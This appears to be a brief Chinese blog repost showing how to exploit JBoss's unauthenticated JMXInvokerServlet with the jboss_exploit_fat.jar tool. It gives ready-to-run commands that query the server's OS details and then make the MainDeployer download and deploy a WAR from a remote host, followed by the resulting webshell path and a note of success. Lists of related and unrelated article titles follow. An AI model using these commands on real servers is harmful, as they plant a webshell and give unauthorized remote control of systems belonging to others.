1. 查看系统名称

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

  1. 查看系统版本

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion

3.远程部署war

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war

获得shell地址:
www.any.com:8080/no/index.jsp

成功!

转载于:https://www.cnblogs.com/n00p/p/8951922.html

Jboss未授权访问部署木马 利用exp相关推荐

  1. JBoss未授权访问漏洞Getshell过程复现

    文章目录 前言 漏洞复现 漏洞描述 靶场搭建 漏洞利用 防御手段 Jexboss脚本 前言 在 2021 年第五届强网杯全国网络安全挑战赛的 EasyWeb 赛题中遇到了 JBoss 未授权访问漏洞 ...

  2. Redis未授权访问漏洞的利用及防护

    什么是Redis未授权访问漏洞? Redis在默认情况下,会绑定在0.0.0.0:6379.如果没有采取相关的安全策略,比如添加防火墙规则.避免其他非信任来源IP访问等,这样会使Redis服务完全暴露 ...

  3. Jboss未授权访问漏洞记录(影响版本:全版本,端口:80,8080)

    一.前言 漏洞原因:在低版本中,默认可以访问Jboss web控制台(http://127.0.0.1:8080/jmx-console),无需用户名和密码. 二.环境配置 使用docker搭建环境 ...

  4. Celery Redis未授权访问命令执行利用

    首发补天社区:https://forum.butian.net/share/224←走过路过帮点一下~ 前言 Celery 是一个简单.灵活且可靠的分布式系统,用于处理大量消息,同时为操作提供维护此类 ...

  5. jexboss工具 -- JBOSS未授权访问漏洞利用

    其实所有的节日,都不是为了礼物和红包而生,而是提醒我们不要忘记爱与被爱,生活需要仪式感,而你需要的是在乎和关爱... ----  网易云热评 小受:Ubuntu20 小攻:Kali2020 一.搭建该 ...

  6. MongoDB 未授权访问漏洞利用

    点击"仙网攻城狮"关注我们哦~ 不当想研发的渗透人不是好运维 让我们每天进步一点点 简介 MongoDB是一个基于分布式文件存储的数据库,是一个介于关系数据库和非关系数据库之间的产 ...

  7. 二十八种未授权访问漏洞合集(暂时最全)

    目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...

  8. 常用的30+种未授权访问漏洞汇总

    未授权访问漏洞汇总预览 1 .FTP 未授权访问(21) 2 .LDAP 未授权访问(389) 3 .Rsync 未授权访问(873) 4 .ZooKeeper 未授权访问(2181) 5 .Dock ...

  9. 常见未授权访问漏洞详解

    参考文章1:二十八种未授权访问漏洞合集(CSDN) 参考文章2:28种未授权访问漏洞(知乎) 参考文章3:未授权访问漏洞总结(freebuf) 参考文章4:常见未授权访问漏洞总结(先知社区) 文章目录 ...

最新文章

  1. P1155 双栈排序(二分图的染色判断+链式前向星)
  2. SQL Server中DateTime格式转换
  3. redis mysql 解决超卖_Redis 分布式锁解决超卖问题
  4. 万字长文浅析SpringCould微服务负载均衡框架Ribbon源码(字多慎入)
  5. sklearn自学指南(part43)--数据加载工具
  6. 5-输入输出系统IO
  7. java连接phpstudy_PHPStudy快速自动搞定所有配置文件
  8. Android(java)学习笔记27:TextView属性大全
  9. 在落雨的鼓浪屿打着伞到处走走找个地方坐坐
  10. LeetCode 410. Split Array Largest Sum
  11. python画图代码大全-Python Matplotlib 绘图使用指南 (附代码)
  12. java-第十一章-类的无参方法-模拟ATM机进行账户余额查询
  13. 学堂在线体育与社会期末考试答案(武汉体育学院)(学堂在线)网课搜题
  14. mujoco安装教程
  15. 打开word文档提示文件未找到_Word格式转换大全!三分钟把100份Word文档转为PDF、PPT、JPG文件...
  16. 计算机解译地学应用效果,2014年中国地质大学(武汉)0816测绘科学与技术考研大纲...
  17. IDEA官方中文插件!!!
  18. Volley,Glide,Swiperefreshlayout 简单使用
  19. tomcat加大内存配置
  20. SpringSecurity超详细入门介绍

热门文章

  1. 【docker】第五节:docker常用命令总结
  2. 实现树状结构_组合模式 - 树状结构的优雅实现
  3. Spring Boot文档阅读笔记-构建Restful风格的WebService
  4. Java笔记-对tomcat进一步认识
  5. Java笔记-使用RabbitMQ的Java接口实现Publish/Subscribe(订阅模式)
  6. Qt/C++工作笔记-vector与QVector的拷贝复制(区别与联系)
  7. 分析linux系统的运行性能,Linux系统下常见性能分析工具的使用
  8. linux里的run-level,linux run level 为何物
  9. c语言 隐式声明,关于C#:隐式函数声明和链接
  10. 寄存器相互映射是什么意思_STM32入门系列-STM32外设地址映射